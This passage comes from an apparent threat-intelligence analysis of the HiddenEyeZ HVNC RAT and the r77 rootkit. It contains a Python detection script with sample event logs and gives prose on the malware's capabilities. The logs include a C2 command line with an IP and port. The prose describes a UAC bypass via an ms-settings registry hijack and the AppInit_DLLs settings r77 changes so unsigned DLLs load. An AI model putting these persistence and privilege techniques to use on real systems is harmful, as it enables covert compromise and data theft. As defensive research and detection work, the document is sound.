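     'TargetObject': 'HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Installs',
     'Details': 'C:\\Users\\victim\\Downloads\\Installs.exe'},
    {'EventID': 1, 'Image': 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe',
     'ParentImage': 'C:\\Users\\victim\\Downloads\\Installs.exe',
     'CommandLine': 'cvtres.exe HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE'},
    # Benign noise: the C# compiler legitimately spawns cvtres.exe with switches.
    {'EventID': 1, 'Image': 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe',
     'ParentImage': 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe',
     'CommandLine': 'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\\Temp\\RES1.tmp C:\\Temp\\CSC1.tmp'},
]

# Key paths are matched from a leading backslash so that HKCU\... and HKU\<SID>\... both hit.
MS_SETTINGS_HIJACK = re.compile(r'\\Software\\Classes\\ms-settings\\shell\\open\\command', re.I)
RUN_KEYS = re.compile(r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\', re.I)
# Shape of the hollowed cvtres.exe command line seen above: <tag> <IPv4> <port> ...
CVTRES_C2 = re.compile(
    r'cvtres\.exe\s+(?P<tag>\S+)\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b', re.I)


def parse_cvtres_c2(cmdline: str):
    """Pull tag, C2 host and port out of a hollowed cvtres.exe command line, else None."""
    m = CVTRES_C2.search(cmdline)
    if not m:
        return None
    return {'tag': m.group('tag'), 'host': m.group('host'), 'port': int(m.group('port'))}


def detect(events) -> list:
    """Return (rule, detail) pairs for every event matching one of the dropper's steps."""
    hits = []
    for ev in events:
        if ev['EventID'] == 13:
            target, details = ev['TargetObject'], ev.get('Details', '')
            if MS_SETTINGS_HIJACK.search(target):
                hits.append(('uac_bypass_ms_settings_hijack', ev['Image']))
            if 'add-mppreference' in details.lower():
                hits.append(('defender_exclusion_added', details))
            if RUN_KEYS.search(target) and details.lower().endswith('.exe'):
                hits.append(('run_key_persistence', details))
        elif ev['EventID'] == 1:
            image, parent = ev['Image'].lower(), ev.get('ParentImage', '').lower()
            # ComputerDefaults.exe launched by something outside C:\Windows is the bypass trigger.
            if image.endswith('\\computerdefaults.exe') and not parent.startswith('c:\\windows\\'):
                hits.append(('computerdefaults_from_user_path', ev['ParentImage']))
            if image.endswith('\\cvtres.exe'):
                c2 = parse_cvtres_c2(ev['CommandLine'])
                if c2:
                    hits.append(('cvtres_hollowed_c2', '{}:{}'.format(c2['host'], c2['port'])))
    return hits


if __name__ == '__main__':
    for rule, detail in detect(EVENTS):
        print(rule, '->', detail)
```

<p>The registry rules are the cheapest to deploy: a legitimate user has no reason to create HKCU\\Software\\Classes\\ms-settings at all, so any write there is worth an alert regardless of the command it carries, and it fires before ComputerDefaults.exe is even launched.<\/p>
<p>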
The dropper also starts the RAT on a secondary Windows desktop, which hides <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/winstation\/desktops\" target=\"_blank\" rel=\"noopener\">the visible actions performed by HiddenEyeZ HVNC<\/a> from the user.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 12: deployment code of the main component of the HiddenEyeZ HVNC malware<\/small><\/em><\/p>\n<h3>HiddenEyeZ HVNC<\/h3>\n<h4>Malware identity card<\/h4>\n<table>\n<tbody>\n<tr><td>Type of file<\/td><td>PE<\/td><\/tr>\n<tr><td>Language used<\/td><td>.NET<\/td><\/tr>\n<tr><td>Compilation date<\/td><td>Sat Mar 25 03:59:41 2045 (incoherent: the date lies in the future; .NET compilers building deterministically store a content hash in this PE field instead of a real time, so it cannot be used to date the sample)<\/td><\/tr>\n<tr><td>Obfuscation<\/td><td>No<\/td><\/tr>\n<tr><td>md5<\/td><td>3ebd5b7adb726ccd04079e3dc114063b<\/td><\/tr>\n<tr><td>sha1<\/td><td>bf84a490838c741631ba641d0fd673f3043a5751<\/td><\/tr>\n<tr><td>sha256<\/td><td>ba1615c7617f148228c587ffe7607ac841fd682ba4905f4af53e18d601b84102<\/td><\/tr>\n<tr><td>ssdeep<\/td><td>3072:L6IxdMnKhwoa5riuHNTapbBgn4qBwS7YXzwIjD6ZGsp:pMnKa5rirpbGn4awS7YXzwIjuZGs<\/td><\/tr>\n<\/tbody>\n<\/table>\n<h4>Malware presentation<\/h4>\n<p>This sample is the one embedded and executed by the dropper described above (Install.exe). The executable is a sample of the HiddenEyeZ HVNC RAT, developed, used and sold by the HiddenEyeZ group.<\/p>\n<p>The malware is used to steal sensitive information from victims (passwords, personal files, cryptocurrency wallets, etc.). 
Pour cela, il poss\u00e8de deux capacit\u00e9s principales :<\/p>\n<ul>\n<li>d\u00e9ployer le stealer Icarus (<em>voir la partie \u00ab\u00a0<\/em><em>Icarus\u00a0\u00bb<\/em>)\u00a0;<\/li>\n<li>donner un acc\u00e8s HVNC (Hidden VNC) qui est une fonctionnalit\u00e9 pour interagir via une interface graphique avec la machine cible. Ces interactions sont invisibles pour la victime (<em>voir la partie \u00ab\u00a0Bureau cach\u00e9\u00a0\u00bb<\/em>).<\/li>\n<\/ul>\n<h4>Description d\u00e9taill\u00e9e du malware<\/h4>\n<p>Ce malware r\u00e9cup\u00e8re ses ordres depuis son serveur de C2 dont l'adresse lui est communiqu\u00e9e par les arguments de sa ligne de commande. Les messages re\u00e7us du serveur permettent d'activer un ensemble de fonctionnalit\u00e9s :<\/p>\n<ul>\n<li>d\u00e9sactivation de Windows Defender\u00a0:\n<ul>\n<li>t\u00e9l\u00e9chargement et lancement de l'ex\u00e9cutable Highlander\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>lancement de logiciels sur un bureau cach\u00e9\u00a0:\n<ul>\n<li>navigateurs web en mettant en place du monitoring pour r\u00e9cup\u00e9rer des\u00a0donn\u00e9es\u00a0;<\/li>\n<li>clients mails\u00a0;<\/li>\n<li>\u00e9diteurs de textes\u00a0;<\/li>\n<li>logiciels de discussions (Skype, Discord, Telegram)\u00a0;<\/li>\n<li>utilitaire de portefeuilles de cryptomonnaies\u00a0;<\/li>\n<li>configuration du syst\u00e8me Windows\u00a0;<\/li>\n<li>explorateur Windows\u00a0;<\/li>\n<li>consoles (cmd et PowerShell)\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>utilisation du bureau cach\u00e9 par le cyber-attaquant\u00a0:\n<ul>\n<li>manipulation de fen\u00eatres\u00a0;<\/li>\n<li>clic sur la machine cible\u00a0;<\/li>\n<li>\u00e9criture \/ r\u00e9cup\u00e9ration des donn\u00e9es du copier \/ coller\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>r\u00e9cup\u00e9ration d'informations du syst\u00e8me (FPS, r\u00e9solution \u00e9cran) utilis\u00e9es pour le bureau\u00a0cach\u00e9\u00a0;<\/li>\n<li>arr\u00eat de processus\u00a0:\n<ul>\n<li>un processus arbitraire 
(PID)\u00a0;<\/li>\n<li>les navigateurs web\u00a0;<\/li>\n<li>Putty\u00a0;<\/li>\n<li>les clients mails\u00a0;<\/li>\n<li>les logiciels de discussions (Skype, Discord, Telegram)\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>t\u00e9l\u00e9chargement et lancement d'un binaire arbitraire (via Powershell)\u00a0;<\/li>\n<li>d\u00e9ploiement d'un stealer\u00a0:\n<ul>\n<li>t\u00e9l\u00e9chargement et lancement du stealer Icarus\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>mise en place de persistance (t\u00e9l\u00e9chargement et lancement d'un outil d\u00e9di\u00e9, AddStartupTask) :\n<ul>\n<li>cr\u00e9ation de t\u00e2ches planifi\u00e9es\u00a0;<\/li>\n<li>ajout de persistance pour l'ex\u00e9cutable\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>mise en place de moyens de furtivit\u00e9\u00a0:\n<ul>\n<li>t\u00e9l\u00e9chargement, d\u00e9marrage et arr\u00eat du rootkit r77 ;<\/li>\n<\/ul>\n<\/li>\n<li>auto-d\u00e9sinstallation.<\/li>\n<\/ul>\n<h5>Organisation des composants<\/h5>\n<p>Une partie des fonctionnalit\u00e9s du malware n'est pas int\u00e9gr\u00e9e dans son code source, mais d\u00e9l\u00e9gu\u00e9e \u00e0 d'autres outils qui sont t\u00e9l\u00e9charg\u00e9s et d\u00e9ploy\u00e9s \u00e0 la demande. 
All downloads of executables, and of the .NET libraries they need to run, are made from the site hxxps:\/\/hiddeneyez.com\/icar\/.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 13: listing of the files available on the \/icar\/ repository of the HiddenEyeZ HVNC malware (non-exhaustive)<\/small><\/em><\/p>\n<h5>Builder tool<\/h5>\n<p>The HiddenEyeZ HVNC malware is generated from a builder that is used to configure and produce the malware sample. Many features can be enabled or disabled as the user sees fit.<\/p>\n<p>Below is a screenshot of the builder, which is used to choose the features to include in the generated executable.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 14: builder interface used to configure and generate the HiddenEyeZ malware sample<\/small><\/em><\/p>\n<h5>Hidden desktop<\/h5>\n<p>The HiddenEyeZ malware allows the attacker to launch software on a secondary desktop that is invisible on the victim's workstation. This is made possible by <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/winstation\/desktops\" target=\"_blank\" rel=\"noopener\">creating a desktop dedicated to the malicious actions<\/a>. The point of such a feature is to let the attacker carry out actions directly from the victim's workstation, using the information stolen from the victim (logins, passwords, etc.) or already present on the machine, such as session cookies, passwords saved in the browser and so on. 
The IP address this workstation connects from is most likely already known to the remote services (banks, cryptocurrency platforms and the like), which will therefore not raise an alert for suspicious or fraudulent connections, as they would for a connection from another computer.<\/p>\n<p>The attacker thus gets a graphical view of the machine and can act on it without the victim noticing. They can browse the system and, for example, launch the victim's browsers and e-mail clients to find further sensitive information.<\/p>\n<p>Below are a few screenshots released by the group's developers to showcase the HiddenEyeZ HVNC administration console. They show, for example, the lists of software supported on the hidden desktop.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 15: screenshots of the administration tool interface of the HiddenEyeZ malware<\/small><\/em><\/p>\n<h5>Deployment of the Icarus stealer<\/h5>\n<p>The HiddenEyeZ malware can deploy a third-party stealer that automatically harvests sensitive data from the victim. This stealer is another known malware: Icarus.<\/p>\n<p>The following code excerpt shows the download, writing to disk, execution and deletion of the stealer executable.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 16: deployment code of the Icarus stealer<\/small><\/em><\/p>\n<p>Once Icarus has finished running, HiddenEyeZ HVNC exfiltrates the archive containing all the data collected from the victim's workstation.<\/p>\n<h3>r77<\/h3>\n<p>r77 is a rootkit retrieved by the dropper and by HiddenEyeZ HVNC as the files rt.jpg and remove.jpg from hiddeneyez[.]com and from the HiddenEyeZ GitHub repository. These binaries are the installer (rt.jpg) and the uninstaller (remove.jpg) of the rootkit, whose source code is available here: <a href=\"https:\/\/github.com\/bytecode77\/r77-rootkit\" target=\"_blank\" rel=\"noopener\">github.com\/bytecode77\/r77-rootkit<\/a>.<\/p>\n<p>As stated in its documentation, it is a userland rootkit that can hide:<\/p>\n<ul>\n<li>files and directories;<\/li>\n<li>processes and their CPU usage;<\/li>\n<li>registry keys and values;<\/li>\n<li>services;<\/li>\n<li>network connections (TCP, UDP);<\/li>\n<li>scheduled tasks;<\/li>\n<li>junctions, named pipes and scheduled tasks.<\/li>\n<\/ul>\n<p>Our analysis nevertheless suggests that this is a lightweight version, as not all of these features are present in the analysed sample.<\/p>\n<p>Both files were hosted on the repository base64-encoded with a .jpg extension, in order to evade signature-based detection by security products. 
We therefore decoded them before analysing them.<\/p>\n<h4>r77 installer<\/h4>\n<h5>ID card<\/h5>\n<table>\n<tbody>\n<tr><td>Type of file<\/td><td>PE<\/td><\/tr>\n<tr><td>Language used<\/td><td>.NET<\/td><\/tr>\n<tr><td>Compilation date<\/td><td>Wed Jul 13 17:30:36 2022<\/td><\/tr>\n<tr><td>Obfuscation<\/td><td>No<\/td><\/tr>\n<tr><td>md5<\/td><td>a532918af845ed035c6882d6ae173d03<\/td><\/tr>\n<tr><td>sha1<\/td><td>7b0dadd2b5b6200676a7daf68f95d47319513f81<\/td><\/tr>\n<tr><td>sha256<\/td><td>4604e501fb4efb5ce862e81232c61b29e4470b5313055efb291593d66f23af7e<\/td><\/tr>\n<tr><td>ssdeep<\/td><td>24576:fBm2D0GlV7LJMLMVSBsalgydd4jnYnyeiRyi5+fEilGQ8Joz078UfJeOYyF42fQo:Q2D0mV76LMV1algAkYPY+78J04r4zzW<\/td><\/tr>\n<\/tbody>\n<\/table>\n<p>The r77 installer is obtained once the rt.jpg file hosted on the repository has been decoded.<\/p>\n<h5>Overview<\/h5>\n<p>Installing the rootkit is straightforward: the binary embeds two DLL files in its resources, a 32-bit one and a 64-bit one. The DLL matching the targeted operating system (64- or 32-bit) is extracted from the resources and then copied into the <code>%APPDATA%<\/code> directory.<\/p>\n<p>The rest of the setup consists in referencing these files in the appropriate registry value and modifying two others:<\/p>\n<table>\n<tbody>\n<tr><th>Registry value<\/th><th>Description<\/th><\/tr>\n<tr><td><code>HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs<\/code><\/td><td>Set to 1, which enables the AppInit_DLLs mechanism<\/td><\/tr>\n<tr><td><code>HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs<\/code><\/td><td>Set to 0 so that unsigned DLLs are loaded<\/td><\/tr>\n<tr><td><code>HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs<\/code><\/td><td>Contains the path of the DLL to load (r77-x64.dll or r77-x86.dll)<\/td><\/tr>\n<\/tbody>\n<\/table>\n<p>These malicious DLLs are loaded automatically by user32.dll and, consequently, by every program that uses it, that is, most programs with a graphical interface.<\/p>\n<p>The documentation states that, starting with Windows 8, the AppInit_DLLs mechanism is disabled when Secure Boot is enabled, which reduces the number of potential targets.<\/p>\n<p>More information on the AppInit_DLLs mechanism can be found on <a href=\"https:\/\/learn.microsoft.com\/fr-fr\/windows\/win32\/win7appqual\/appinit-dlls-in-windows-7-and-windows-server-2008-r2\" target=\"_blank\" rel=\"noopener\">Microsoft's website<\/a>, from which the following is an excerpt: \u201c<em>AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user-mode process on the system. Microsoft is modifying the AppInit DLLs facility in Windows 7 and Windows Server 2008 R2 to add a new code-signing requirement. This will help improve system reliability and performance, as well as improve visibility into the origin of software<\/em>\u201d.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 17: installation code of the r77 rootkit<\/small><\/em><\/p>\n<p>Since modifying these keys requires administrator privileges, the UAC bypass technique seen earlier (<em>see the \u201cHiddenEyeZ HVNC dropper\u201d section<\/em>) is reused in this binary.<\/p>\n<h4>r77 uninstaller<\/h4>\n<h5>ID card<\/h5>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_4\"\n     id='ninja_table_builder_414273'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_4\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414273\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: 
auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td 
id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid 
rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Thu Dec 6 16:06:38 2040 | Incoherent<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 
0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; 
color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">d406a1906ed519562f2524a03bf2ff40<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">38b73304bfaf8db51b63946cd4ab29fa48c15816<\/span> <!----> <!----><\/div> <div 
class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">6c1b2c9ae4887ff134bd098cab3e6c5ada1482f45a129ccc858733a545a10619<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" 
style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i 